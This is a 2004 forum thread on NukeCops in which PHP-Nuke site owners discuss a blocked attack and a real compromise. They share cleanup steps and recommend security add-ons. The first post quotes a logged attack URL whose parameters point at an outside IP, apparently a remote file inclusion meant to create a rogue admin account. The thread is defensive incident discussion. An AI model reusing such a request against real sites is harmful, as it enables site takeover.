You are missing our premiere tool bar navigation system! Register and use it for FREE!

NukeCops  
•  Home •  Downloads •  Gallery •  Your Account •  Forums • 
Readme First
- Readme First! -

Read and follow the rules, otherwise your posts will be closed
Modules
· Home
· FAQ
· Buy a Theme
· Advertising
· AvantGo
· Bookmarks
· Columbia
· Community
· Donations
· Downloads
· Feedback
· Forums
· PHP-Nuke HOWTO
· Private Messages
· Search
· Statistics
· Stories Archive
· Submit News
· Surveys
· Theme Gallery
· Top
· Topics
· Your Account
Who's Online
There are currently, 64 guest(s) and 1 member(s) that are online.

You are Anonymous user. You can register for free by clicking here
Nuke Cops :: View topic - Whats that hack??? [ ]
 Forum FAQ  •  Search  •   •  Memberlist  •  Usergroups   •  Register  •  Profile •    •  Log in to check your private messages  •  Log in

 
This forum is locked: you cannot post, reply to, or edit topics.  This topic is locked: you cannot edit posts or make replies.printer-friendly view
View previous topic Log in to check your private messages View next topic
Author Message
djtom-i
Nuke Cadet
Nuke Cadet


Joined: Feb 08, 2004
Posts: 4


PostPosted: Sat Jun 26, 2004 6:10 am Reply with quoteBack to top

Hi Guys someone tried to hack me...

The Hacker tried that an was blocked...


www.mydomain.de/modules.php?name=http://217.59.104.226/&op=http://217.59.104.226/&eid=http://217.59.104.226


What did he try to???

Thx

MR. X
Find all posts by djtom-iView user's profileSend private message
MrFluffy
Captain
Captain


Joined: Aug 06, 2003
Posts: 411

Location: Berlin

PostPosted: Sat Jun 26, 2004 8:58 am Reply with quoteBack to top

Long time no see Wink The world is small...

That's a remote attack trying to insert an admin (the ip leads to an external script, at least that's what raven's forums say).


(aconrads)

_________________
cu, MrFluffy

conrads-berlin.de
nuke-platinum.de
Find all posts by MrFluffyView user's profileSend private messageVisit poster's websiteAIM AddressYahoo MessengerMSN MessengerICQ Number
Xeon
Sergeant
Sergeant


Joined: Aug 28, 2003
Posts: 144

Location: USA

PostPosted: Sat Jun 26, 2004 1:32 pm Reply with quoteBack to top

I'd also like to point out that this is another case of the RIPE ISP IP being used.

I ban this whole range because of the crap that comes from this source of IP's. *Shakes his head*

_________________
Xeon
http://www.credit-repair-combat.com/
Find all posts by XeonView user's profileSend private messageVisit poster's website
djtom-i
Nuke Cadet
Nuke Cadet


Joined: Feb 08, 2004
Posts: 4


PostPosted: Sun Jun 27, 2004 5:22 am Reply with quoteBack to top

thx guys!

the world is a kugel!!! (kugel=german for ball!)

nice day!
Find all posts by djtom-iView user's profileSend private message
RHG-ShosMeister
Nuke Cadet
Nuke Cadet


Joined: Jun 27, 2004
Posts: 1


PostPosted: Sun Jun 27, 2004 7:06 am Reply with quoteBack to top

Okay. So what did you have installed that blocked it? We got hit last night. Not too big of a deal as I had a backup from yesterday and it looked like all that was changed was the index.php so I replaced it.

I also found a file in our my_uploads module for a user that wasn't registered .big.red^^

The directory is there but, even through c-panel, I can't change the permissions of the file. I was able to rename the directory so that should prevent access to it until I can delete it but ......

The file that was uploaded was lahmacun3.php. Ever heard of it? I did a google search and it's a turkish pizza (lahmacun at least).
Find all posts by RHG-ShosMeisterView user's profileSend private message
bretonmage
Captain
Captain


Joined: Feb 21, 2004
Posts: 421


PostPosted: Sun Jun 27, 2004 7:59 am Reply with quoteBack to top

Sentinel or Protector will block it.

_________________
Image
Find all posts by bretonmageView user's profileSend private message
ShosMeister
Nuke Cadet
Nuke Cadet


Joined: Apr 07, 2004
Posts: 3


PostPosted: Sun Jun 27, 2004 11:08 am Reply with quoteBack to top

I'm guessing they are here - I'll take a look. Any recommendation as to which is better?

Question though. Looking through the logs, I can see where they inserted a GOD user. As I am admining remotely, is there a way that I can find and delete this user?
Find all posts by ShosMeisterView user's profileSend private messageVisit poster's websiteAIM Address
MrFluffy
Captain
Captain


Joined: Aug 06, 2003
Posts: 411

Location: Berlin

PostPosted: Sun Jun 27, 2004 11:12 am Reply with quoteBack to top

You can restore the backup of your _authors table.

_________________
cu, MrFluffy

conrads-berlin.de
nuke-platinum.de
Find all posts by MrFluffyView user's profileSend private messageVisit poster's websiteAIM AddressYahoo MessengerMSN MessengerICQ Number
ShosMeister
Nuke Cadet
Nuke Cadet


Joined: Apr 07, 2004
Posts: 3


PostPosted: Sun Jun 27, 2004 11:35 am Reply with quoteBack to top

Actually, I found the entry in our log file where he created it and found the password so I changed it from GOD and changed the password.

Don't want to delete anything just yet, although I'm sure he can get back in until I get it patched.

Thanks!!
Find all posts by ShosMeisterView user's profileSend private messageVisit poster's websiteAIM Address
Xeon
Sergeant
Sergeant


Joined: Aug 28, 2003
Posts: 144

Location: USA

PostPosted: Sun Jun 27, 2004 3:57 pm Reply with quoteBack to top

I use Fortress and Protector and it seems to be doing a great job, so if you haven't looked at these two security items I would give them a try.

_________________
Xeon
http://www.credit-repair-combat.com/
Find all posts by XeonView user's profileSend private messageVisit poster's website
ShosMeister
Nuke Cadet
Nuke Cadet


Joined: Apr 07, 2004
Posts: 3


PostPosted: Sun Jun 27, 2004 4:07 pm Reply with quoteBack to top

I found fortress here but couldn't find protector. Is it not on this site?
Find all posts by ShosMeisterView user's profileSend private messageVisit poster's websiteAIM Address
BrainSmashR
Support Mod
Support Mod


Joined: Jan 05, 2004
Posts: 1390

Location: Louisiana, USA

PostPosted: Sun Jun 27, 2004 4:41 pm Reply with quoteBack to top

http://protector.warcenter.se/

_________________
ImageImage
USE THE FORUM. If you contact me via messenger for support I will add you to my ignore list.
Find all posts by BrainSmashRView user's profileSend private messageVisit poster's websiteYahoo MessengerMSN MessengerICQ Number
Xeon
Sergeant
Sergeant


Joined: Aug 28, 2003
Posts: 144

Location: USA

PostPosted: Sun Jun 27, 2004 4:47 pm Reply with quoteBack to top

Heh, Thanks for posting BrainSmashR !

Your just to darned quick LOL!

_________________
Xeon
http://www.credit-repair-combat.com/
Find all posts by XeonView user's profileSend private messageVisit poster's website
Display posts from previous:      
This forum is locked: you cannot post, reply to, or edit topics.  This topic is locked: you cannot edit posts or make replies.printer-friendly view
View previous topic Log in to check your private messages View next topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum



Powered by phpBB © 2001, 2005 phpBB Group

Ported by Nuke Cops © 2003 www.nukecops.com
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::
Powered by · TOGETHER TEAM srl ITALY http://www.togetherteam.it · DONDELEO E-COMMERCE http://www.DonDeLeo.com
Web site engine's code is Copyright © 2002 by PHP-Nuke. All Rights Reserved. PHP-Nuke is Free Software released under the GNU/GPL license.
Page Generation: 0.216 Seconds - 324 pages served in past 5 minutes. Nuke Cops Founded by Paul Laudanski (Zhen-Xjell)
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::